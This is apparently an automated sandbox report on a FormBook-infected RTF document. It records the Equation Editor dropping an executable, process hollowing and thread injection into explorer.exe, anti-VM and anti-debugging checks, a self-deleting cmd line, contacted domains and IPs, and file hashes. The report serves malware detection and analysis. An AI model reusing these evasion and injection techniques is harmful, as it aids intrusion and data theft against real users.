Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Roaming\propser16364.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\propser16364.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	RDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2680	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2276	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2276	Thread sleep time: -66000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 3064	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2476	Thread sleep time: -60000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	4_2_004059F0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_0040659C FindFirstFileA,FindClose,	4_2_0040659C
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_004027A1 FindFirstFileA,	4_2_004027A1

Source: explorer.exe, 00000006.00000000.2096466356.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.2091045872.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000006.00000000.2096466356.0000000004234000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: propser16364.exe, 00000004.00000002.2090930540.00000000004D4000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Code function: 5_2_0040ACD0 LdrLoadDll,

5_2_0040ACD0

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_10001000 mov eax, dword ptr fs:[00000030h]	4_2_10001000
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_0044165A mov eax, dword ptr fs:[00000030h]	4_2_0044165A
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_00441872 mov eax, dword ptr fs:[00000030h]	4_2_00441872
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008426F8 mov eax, dword ptr fs:[00000030h]	5_2_008426F8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AA26F8 mov eax, dword ptr fs:[00000030h]	7_2_00AA26F8

Enables debug privileges

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Code function: 4_2_10001444 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_10001444

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.photograph-gallery.com
Source: C:\Windows\explorer.exe	Domain query: www.devarajantraders.com
Source: C:\Windows\explorer.exe	Network Connect: 154.86.42.252 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.217.18.115 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.samytango.com

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Section loaded: unknown target: C:\Users\user\AppData\Roaming\propser16364.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Thread register set: target process: 1388			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: DE0000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Process created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exe	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\propser16364.exe'	Jump to behavior

Source: explorer.exe, 00000006.00000000.2091183842.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.2091183842.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.2091045872.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2091183842.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\user\AppData\Roaming\propser16364.exe

4_2_00403461

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.unpack, type: UNPACKEDPE

Analysis Report c8080fbf_by_Libranalysis

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	403424
Product:	CloudBasic
Start time:	05:36:10
Start date:	04.05.2021
Sample:	c8080fbf_by_Libranalysis
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	c8080fbfc825b01f11973566f1a3e589
SHA1:	9aa04e64414bef6504b211615f7fcdbe84cd75df
SHA256:	af801e43101c06e3366d942715a8b10f90f12ec3437cab1b8a0cc3872101eebe
Filetype:	Rich Text Format (5005/1) 55.56%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	AA6168D4E41CED2091BAEE9F5D59E11E	DE7F4A8270FE216E68076CE93243B60D6D6D5F51	7C6393B4E86EA5CEC49C0F814B17E4BB85AA447C19896037252A94FF6416CE1B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0EAA9687-30AB-4901-9D2A-3CE504568F55}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F7C72BCE-A594-453E-90B7-97C10E531855}.tmp	data	087E851211D2CFCEC7A36FC880D4BDEE	FDE27ADC3042DFFB257A8C7BB04084987EA3B508	FC69CA6FFFED9AAC3E4E1E2BA2DA4A99304DC901EF61049147DD300B1612A9AE
C:\Users\user\AppData\Local\Temp\1e000hwxgklm05j	data	0E043A70F7132DE9752A3A00D0E81709	5E6406075974431A850271D0D9BFD3A8B25A66CC	E1805165F3143A70B264E2D209D73B08B23E49325B69BA26A99D027E14031214
C:\Users\user\AppData\Local\Temp\92ta8lv1ui5nbpv	PGP\011Secret Key -	001DEAC62FFE30ED641352197488000F	AF88F97944FAFF6E0A3FA6ECF8F1A50B58359905	BB8E07C8E3D229E06690D68EF4BF55DB64A7CC2E6FFB08A06961844C45F1B4A2
C:\Users\user\AppData\Local\Temp\nshAAB2.tmp	data	02AA3F2DF8A114CF5F305E56B633F14E	EEBD4C911882C0BA37C58B5850A9E3A1EA6B8DE9	95135718C211453FF5053D7559EFFD535B93CB4AEF7FAC75C5579D773A281E50
C:\Users\user\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	7BEE24F38E906D08F10C1B51BE4BE749	588F2F0F8B859E15620FBEC8E6381C6ADDF2A3FD	974E158EA37951D137839D4189279330AA2E85F5BAFA4F273F7007673CD4D3FC
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\c8080fbf_by_Libranalysis.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue May 4 11:36:27 2021, mtime=Tue May 4 11:36:27 2021, atime=Tue May 4 11:36:34 2021, length=385915, window=hide	807D638D75FB3AF2AE8C4DE1E22B2C37	BEE66992C36BA6D3E1F6F8402DA281B01E33FC9B	928A0D6070F7EE1E31AE178971CD32ED3AC191EEA81CBBE23F6C2EC79C31760C
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	A52333358A570C730478696C25FF9EEA	9F28ED9BBC8038877546637C0A87F90647D6FD62	7E2E6278AEA47E0EFFE08FF92A5482391835FC1D508A0B81B75D34038A3EAFD4
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	39EB3053A717C25AF84D576F6B2EBDD2	F6157079187E865C1BAADCC2014EF58440D449CA	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
C:\Users\user\AppData\Roaming\propser16364.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	AA6168D4E41CED2091BAEE9F5D59E11E	DE7F4A8270FE216E68076CE93243B60D6D6D5F51	7C6393B4E86EA5CEC49C0F814B17E4BB85AA447C19896037252A94FF6416CE1B
C:\Users\user\Desktop\~$080fbf_by_Libranalysis.rtf	data	39EB3053A717C25AF84D576F6B2EBDD2	F6157079187E865C1BAADCC2014EF58440D449CA	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A